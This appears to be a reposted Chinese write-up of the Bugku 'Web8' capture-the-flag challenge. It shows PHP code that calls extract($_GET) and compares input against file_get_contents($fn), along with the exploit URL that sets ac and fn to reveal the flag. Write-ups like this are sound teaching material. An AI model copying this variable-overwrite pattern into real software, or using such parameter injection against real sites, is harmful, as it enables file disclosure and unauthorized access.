bugku Web8
来源:互联网 发布:简述什么是大数据时代 编辑:程序博客网 时间:2024/04/30 00:46
<?php
extract($_GET);
if (!empty($ac))
{
$f = trim(file_get_contents($fn));
if ($ac === $f)
{
echo "<p>This is flag:" ." $flag</p>";
}
else
{
echo "<p>sorry!</p>";
}
}
extract($_GET);
if (!empty($ac))
{
$f = trim(file_get_contents($fn));
if ($ac === $f)
{
echo "<p>This is flag:" ." $flag</p>";
}
else
{
echo "<p>sorry!</p>";
}
}
?>
根据题目的提示我们猜测目录下有txt文件,于是我们试出了http://120.24.86.145:8002/web8/flag.txt下有flags
于是根据题意构造得http://120.24.86.145:8002/web8/?ac=flags&fn=flag.txt
便得到flag
如有疑问请联系qq:834368404
阅读全文
0 0
- bugku Web8
- bugku web8
- WEB8-Cookie
- web8 CSS常见属性
- bugku Web4
- bugku Web5
- bugku 域名解析
- bugku 成绩单
- bugku xss
- bugku Web6
- bugku几题writeup
- bugku域名解析记录
- [Bugku]密码???[writeup]
- bugku Reverse Easy_vb wirteup
- bugku 简单xss
- bugku SQL注入测试
- bugku 变量1
- ctf bugku 变量1
- 使用IDEA Maven搭建mybatis环境
- 字符串中找连续最长的数字串
- 使用spring事件驱动机制,实现权限信息的自动收集存库
- 七夕到了, 很漂亮的生成3D红玫瑰花的小小程序的源码,七夕特别制作
- js正则表达式语法
- bugku Web8
- Shell 字符串拆分成数组
- Android开发笔记: Android动态添加、删除控件
- redis入门操作(Mac )
- vi的使用(基础到高阶)以及drwxr-xr-x 的含义
- oracle operation
- 理性收藏,及时学习
- Log4Net使用日记
- android输出word文档
